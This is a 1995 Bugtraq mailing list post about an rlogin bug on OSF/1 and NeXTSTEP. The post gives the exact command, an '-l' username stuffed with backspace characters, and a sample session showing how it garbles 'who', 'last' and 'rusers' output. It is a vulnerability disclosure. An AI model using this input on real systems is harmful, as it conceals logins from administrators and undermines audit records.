Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: rlogin can be used to change finger information

From: tfs () vampire science gmu edu (Tim Scanlon)
Date: Fri, 2 Jun 95 23:02:52 -0400

Casper Dik <casper () Holland Sun COM> wrote:
|This is a flaw common to systems that have rlogind do the authentication.
|Sun systems use the older method of letting login handle the rlogin
|protocol.  If rlogind hadnles the protocol, the username argument
|gets passed on the commandline.
|If login handles the protocol, the username
|can take any shape or form but will only be handled as username.

Some OS's also have another problem with this. You can also
really do rather ugly things to the display listing of
"who" and "last" via this bug. I have tested this on
OSF 1 V3.2 17 alpha, and NeXTSTEP 3.0-3.3. I imagine that
other OS's have a problem with it too.

Basicly, you "rlogin hostname -l -h^H^H^H^H^H^H" with as many
ctrl-H's as the OS will accept. (You get the backspaces by
a ctrl-V ctrl-H sequence)

The result is intresting. On OSF "who" get's totaly munged
up. I belive DEC may have a patch for it now, (as 2 days
after I tested this localy, it was suddenly "fixed"... :O )
On NeXT's, it's less of a mess, but not by much. Here is
a sample session:

vampire:10> rlogin vampire -l -h^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H
login: tfs
Password:
Last login: Fri Jun  2 22:34:11 from
vampire:1> who
tfs      console Jun  2 04:19
tfs      ttyp1   Jun  2 04:22
tfs      ttyp2   Jun  2 04:22
tfs      ttyp3   Jun  2 04:22
courtney ttyp4   Jun  2 22:27   (hostname.deleted)
tfs      ttyp8   Jun  2 19:03
tfs      ttyp9   )un  2 22:35   (
vampire:2> last|more
tfs Fri Jun  2 22:35   still logged in
tfs Fri Jun  2 22:34 - 22:34  (00:00)
courtney  ttyp4    hostname.deleted Fri Jun  2 22:27   still logged in
vampire:5> rusers -l
tfs      vampire:console       Jun  2 04:19   38:40
courtney vampire:ttyp4         Jun  2 22:27      21 (hostname.deleted)
tfs      vampire:ttyp9         Jun  2)22:35         (
vampire:11> rsh vampire
Last login: Fri Jun  2 22:35:58 from
vampire:1>

You can see the result. OSF was far worse, with large chunks of
"who" and the rest not dispalyed....
Obviously it's not that huge a deal, but it provides some intresting
results from a security/bug perspective...

Tim Scanlon


________________________________________________________________
tfs () vampire science gmu edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession
Previous By Date Next
Previous By Thread Next

Current thread: